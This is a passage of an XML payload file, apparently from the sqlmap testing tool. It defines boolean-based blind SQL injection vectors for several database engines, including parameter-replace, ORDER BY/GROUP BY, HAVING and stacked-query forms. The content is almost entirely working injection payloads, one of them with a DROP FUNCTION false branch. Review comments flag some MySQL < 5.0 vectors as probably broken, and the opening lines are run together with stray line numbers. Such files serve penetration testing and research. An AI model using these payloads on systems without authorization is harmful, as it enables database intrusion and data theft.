SYSMASTER:SYSDUAL)</comparison>958</response>959<details>960<dbms>Informix</dbms>961</details>962</test>963964<test>965<title>Microsoft Access boolean-based blind - Parameter replace</title>966<stype>1</stype>967<level>3</level>968<risk>1</risk>969<clause>1,3</clause>970<where>3</where>971<vector>IIF([INFERENCE],[RANDNUM],1/0)</vector>972<request>973<payload>IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0)</payload>974</request>975<response>976<comparison>IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0)</comparison>977</response>978<details>979<dbms>Microsoft Access</dbms>980</details>981</test>982983<test>984<title>Microsoft Access boolean-based blind - Parameter replace (original value)</title>985<stype>1</stype>986<level>4</level>987<risk>1</risk>988<clause>1,3</clause>989<where>3</where>990<vector>IIF([INFERENCE],[ORIGVALUE],1/0)</vector>991<request>992<payload>IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>993</request>994<response>995<comparison>IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>996</response>997<details>998<dbms>Microsoft Access</dbms>999</details>1000</test>10011002<!-- Works in MySQL, 
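Oracle, etc. -->
    <!-- The false branch forces a DBMS error by placing a two-row subquery (UNION of two
         different random numbers) in scalar context; the true branch returns a plain value. -->
    <test>
        <title>Boolean-based blind - Parameter replace (DUAL)</title>
        <stype>1</stype>
        <level>2</level>
        <risk>1</risk>
        <clause>1,2,3</clause>
        <where>3</where>
        <vector>(CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>
        <request>
            <payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>
        </request>
        <response>
            <comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>
        </response>
    </test>

    <test>
        <title>Boolean-based blind - Parameter replace (DUAL - original value)</title>
        <stype>1</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,2,3</clause>
        <where>3</where>
        <vector>(CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</vector>
        <request>
            <payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</payload>
        </request>
        <response>
            <comparison>(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)</comparison>
        </response>
    </test>
    <!-- End of boolean-based blind tests - Parameter replace -->

    <!-- Works in SAP MaxDB, Informix, etc.
         No error is raised here: the false branch simply yields NULL, so detection relies on
         the application rendering a NULL parameter differently from a valid one. -->
    <test>
        <title>Boolean-based blind - Parameter replace (CASE)</title>
        <stype>1</stype>
        <level>2</level>
        <risk>1</risk>
        <clause>1,3</clause>
        <where>3</where>
        <vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
        <request>
            <payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
        </request>
        <response>
            <comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
        </response>
    </test>

    <test>
        <title>Boolean-based blind - Parameter replace (CASE - original value)</title>
        <stype>1</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,3</clause>
        <where>3</where>
        <vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
        <request>
            <payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
        </request>
        <response>
            <comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
        </response>
    </test>
    <!-- End of boolean-based blind tests - Parameter replace -->

    <!-- Boolean-based blind tests - ORDER BY, GROUP BY clause -->
    <!-- False branch: a multi-row scalar subquery over INFORMATION_SCHEMA.PLUGINS raises
         "Subquery returns more than 1 row"; true branch returns a constant. -->
    <test>
        <title>MySQL &gt;= 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title>
        <stype>1</stype>
        <level>2</level>
        <risk>1</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</vector>
        <request>
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</payload>
        </request>
        <response>
            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</comparison>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &gt;= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
        <stype>1</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</vector>
        <request>
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</payload>
        </request>
        <response>
            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</comparison>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0</dbms_version>
        </details>
    </test>

    <!--
    NOTE(review): the two "MySQL < 5.0" tests below use a vector that is byte-identical to the
    ">= 5.0" tests above and depends on INFORMATION_SCHEMA.PLUGINS. INFORMATION_SCHEMA only
    exists from MySQL 5.0 onwards (the PLUGINS table from 5.1), so on the versions these tests
    are labelled for the reference should fail in BOTH branches and the true/false responses
    would not differ. Verify against a real pre-5.0 instance; a version-independent error
    source such as the two-row "SELECT x UNION ALL SELECT y" form used by the Microsoft SQL
    Server/Sybase tests may be what was intended here. Vectors left unchanged pending that check.
    -->
    <test>
        <title>MySQL &lt; 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title>
        <stype>1</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</vector>
        <request>
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</payload>
        </request>
        <response>
            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</comparison>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&lt; 5.0</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &lt; 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
        <stype>1</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</vector>
        <request>
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</payload>
        </request>
        <response>
            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))</comparison>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&lt; 5.0</dbms_version>
        </details>
    </test>

    <!-- False branch: division by a zero-valued subquery raises a division-by-zero error. -->
    <test>
        <title>PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause</title>
        <stype>1</stype>
        <level>2</level>
        <risk>1</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END))</vector>
        <request>
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))</payload>
        </request>
        <response>
            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))</comparison>
        </response>
        <details>
            <dbms>PostgreSQL</dbms>
        </details>
    </test>

    <!-- This one only works in an ORDER BY clause (clause 3), not in GROUP BY. -->
    <test>
        <title>PostgreSQL boolean-based blind - ORDER BY clause (original value)</title>
        <stype>1</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>3</clause>
        <where>1</where>
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
        <request>
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
        </request>
        <response>
            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
        </response>
        <details>
            <dbms>PostgreSQL</dbms>
        </details>
    </test>

    <!--
    TODO: this would work for GROUP BY too if sqlmap did not enclose a string-based [ORIGVALUE]
    in single quotes, but then other payloads would break. It already works for ORDER BY because
    ORDER BY accepts an integer, whereas GROUP BY only accepts the [table].[column] form, so
    [ORIGVALUE] must stay where it is.
    -->
    <test>
        <!-- <title>PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause (GENERATE_SERIES - original value)</title> -->
        <title>PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)</title>
        <stype>1</stype>
        <level>5</level>
        <risk>1</risk>
        <!-- <clause>2,3</clause> -->
        <clause>3</clause>
        <where>1</where>
        <vector>,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
        <request>
            <payload>,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
        </request>
        <response>
            <comparison>,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
        </response>
        <details>
            <dbms>PostgreSQL</dbms>
        </details>
    </test>

    <!-- False branch: a two-row subquery (UNION ALL of two different random numbers) in scalar
         context raises an error. Does not depend on any system catalog. -->
    <test>
        <title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>
        <stype>1</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>3</clause>
        <where>1</where>
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</vector>
        <request>
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</payload>
        </request>
        <response>
            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</comparison>
        </response>
        <details>
            <dbms>Microsoft SQL Server</dbms>
            <dbms>Sybase</dbms>
        </details>
    </test>

    <test>
        <title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)</title>
        <stype>1</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>3</clause>
        <where>1</where>
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</vector>
        <request>
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</payload>
        </request>
        <response>
            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</comparison>
        </response>
        <details>
            <dbms>Microsoft SQL Server</dbms>
            <dbms>Sybase</dbms>
        </details>
    </test>

    <!-- False branch: integer division by a zero-valued subquery on DUAL raises an error. -->
    <test>
        <title>Oracle boolean-based blind - ORDER BY, GROUP BY clause</title>
        <stype>1</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
        <request>
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
        </request>
        <response>
            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
        <stype>1</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
        <request>
            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
        </request>
        <response>
            <comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <!-- False branch: literal division by zero inside IIF(). -->
    <test>
        <title>Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause</title>
        <stype>1</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,IIF([INFERENCE],1,1/0)</vector>
        <request>
            <payload>,IIF([RANDNUM]=[RANDNUM],1,1/0)</payload>
        </request>
        <response>
            <comparison>,IIF([RANDNUM]=[RANDNUM1],1,1/0)</comparison>
        </response>
        <details>
            <dbms>Microsoft Access</dbms>
        </details>
    </test>

    <test>
        <title>Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
        <stype>1</stype>
        <level>5</level>
        <risk>1</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
        <request>
            <payload>,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
        </request>
        <response>
            <comparison>,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
        </response>
        <details>
            <dbms>Microsoft Access</dbms>
        </details>
    </test>

    <!-- No error is raised: the false branch yields NULL (same approach as the CASE
         parameter-replace tests above). -->
    <test>
        <title>SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause</title>
        <stype>1</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,(CASE WHEN [INFERENCE] THEN 1 ELSE NULL END)</vector>
        <request>
            <payload>,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END)</payload>
        </request>
        <response>
            <comparison>,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END)</comparison>
        </response>
        <details>
            <dbms>SAP MaxDB</dbms>
        </details>
    </test>

    <test>
        <title>SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)</title>
        <stype>1</stype>
        <level>5</level>
        <risk>1</risk>
        <clause>2,3</clause>
        <where>1</where>
        <vector>,(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
        <request>
            <payload>,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
        </request>
        <response>
            <comparison>,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
        </response>
        <details>
            <dbms>SAP MaxDB</dbms>
        </details>
    </test>

    <!-- False branch: RAISE_ERROR() with a random message string forces an explicit SQL error. -->
    <test>
        <title>IBM DB2 boolean-based blind - ORDER BY clause</title>
        <stype>1</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>3</clause>
        <where>1</where>
        <vector>,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</vector>
        <request>
            <payload>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</payload>
        </request>
        <response>
            <comparison>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</comparison>
        </response>
        <details>
            <dbms>IBM DB2</dbms>
        </details>
    </test>

    <test>
        <title>IBM DB2 boolean-based blind - ORDER BY clause (original value)</title>
        <stype>1</stype>
        <level>5</level>
        <risk>1</risk>
        <clause>3</clause>
        <where>1</where>
        <vector>,(SELECT CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</vector>
        <request>
            <payload>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</payload>
        </request>
        <response>
            <comparison>,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)</comparison>
        </response>
        <details>
            <dbms>IBM DB2</dbms>
        </details>
    </test>

    <!-- Works in MySQL, Oracle, etc.
         Appends a HAVING condition rather than an expression, so it is tried in WHERE and
         GROUP BY positions (clause 1,2) only. -->
    <test>
        <title>HAVING boolean-based blind - WHERE, GROUP BY clause</title>
        <stype>1</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,2</clause>
        <where>1</where>
        <vector>HAVING [INFERENCE]</vector>
        <request>
            <payload>HAVING [RANDNUM]=[RANDNUM]</payload>
        </request>
        <response>
            <comparison>HAVING [RANDNUM]=[RANDNUM1]</comparison>
        </response>
    </test>
    <!-- End of boolean-based blind tests - ORDER BY, GROUP BY clause -->

    <!-- Boolean-based blind tests - Stacked queries -->
    <test>
        <title>MySQL &gt;= 5.0 boolean-based blind - Stacked queries</title>
        <stype>1</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>1-8</clause>
        <where>1</where>
        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</vector>
        <request>
            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</payload>
            <comment>#</comment>
        </request>
        <response>
            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</comparison>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0</dbms_version>
        </details>
    </test>

    <!--
    NOTE(review): same concern as the "MySQL < 5.0" ORDER BY tests above - this vector is
    identical to the ">= 5.0" one and relies on INFORMATION_SCHEMA.PLUGINS, which should not
    resolve on the versions this test is labelled for. Verify before relying on it.
    -->
    <test>
        <title>MySQL &lt; 5.0 boolean-based blind - Stacked queries</title>
        <stype>1</stype>
        <level>5</level>
        <risk>1</risk>
        <clause>1-8</clause>
        <where>1</where>
        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</vector>
        <request>
            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</payload>
            <comment>#</comment>
        </request>
        <response>
            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</comparison>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&lt; 5.0</dbms_version>
        </details>
    </test>

    <test>
        <title>PostgreSQL boolean-based blind - Stacked queries</title>
        <stype>1</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1-8</clause>
        <where>1</where>
        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>
        <request>
            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</payload>
            <comment>--</comment>
        </request>
        <response>
            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</comparison>
        </response>
        <details>
            <dbms>PostgreSQL</dbms>
        </details>
    </test>

    <!-- Because of the syntax of the GENERATE_SERIES() function, the 'then' value must be 1
         (it is the series step); do not change it. -->
    <test>
        <title>PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)</title>
        <stype>1</stype>
        <level>5</level>
        <risk>1</risk>
        <clause>1-8</clause>
        <where>1</where>
        <vector>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1</vector>
        <request>
            <payload>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1</payload>
            <comment>--</comment>
        </request>
        <response>
            <comparison>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1</comparison>
        </response>
        <details>
            <dbms>PostgreSQL</dbms>
        </details>
    </test>

    <!--
    NOTE(review): the false branch of this test is a DDL statement (DROP FUNCTION on a random
    name). It is expected to fail precisely because [RANDSTR] should not name an existing
    function, but it is the only payload in this file whose error source is a destructive
    statement rather than a failing expression, and DDL may be audited or blocked where a
    plain SELECT is not. Keep that in mind when reading its risk rating of 1.
    -->
    <test>
        <title>Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)</title>
        <stype>1</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1-8</clause>
        <where>1</where>
        <vector>;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>
        <request>
            <payload>;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</payload>
            <comment>--</comment>
        </request>
        <response>
            <comparison>;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</comparison>
        </response>
        <details>
            <dbms>Microsoft SQL Server</dbms>
            <dbms>Sybase</dbms>
        </details>
    </test>

    <test>
        <title>Microsoft SQL Server/Sybase boolean-based blind - Stacked queries</title>
        <stype>1</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>1-8</clause>
        <where>1</where>
        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)</vector>
        <request>
            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)</payload>
            <comment>--</comment>
        </request>
        <response>
            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)</comparison>
        </response>
        <details>
            <dbms>Microsoft SQL Server</dbms>
            <dbms>Sybase</dbms>
        </details>
    </test>

    <test>
        <title>Oracle boolean-based blind - Stacked queries</title>
        <stype>1</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>1-8</clause>
        <where>1</where>
        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</vector>
        <request>
            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</payload>
            <comment>--</comment>
        </request>
        <response>
            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</comparison>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Microsoft Access boolean-based blind - Stacked queries</title>
        <stype>1</stype>
        <level>5</level>
        <risk>1</risk>
        <clause>1-8</clause>
        <where>1</where>
        <vector>;IIF([INFERENCE],1,1/0)</vector>
        <request>
            <payload>;IIF([RANDNUM]=[RANDNUM],1,1/0)</payload>
            <comment>%16</comment>
        </request>
        <response>
            <comparison>;IIF([RANDNUM]=[RANDNUM1],1,1/0)</comparison>
        </response>
        <details>
            <dbms>Microsoft Access</dbms>
        </details>
    </test>

    <test>
        <title>SAP MaxDB boolean-based blind - Stacked queries</title>
        <stype>1</stype>
        <level>5</level>
        <risk>1</risk>
        <clause>1-8</clause>
        <where>1</where>
        <vector>;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END</vector>
        <request>
            <payload>;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END</payload>
            <comment>--</comment>
        </request>
        <response>
            <comparison>;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END</comparison>
        </response>
        <details>
            <dbms>SAP MaxDB</dbms>
        </details>
    </test>
    <!-- End of boolean-based blind tests - Stacked queries -->
</root>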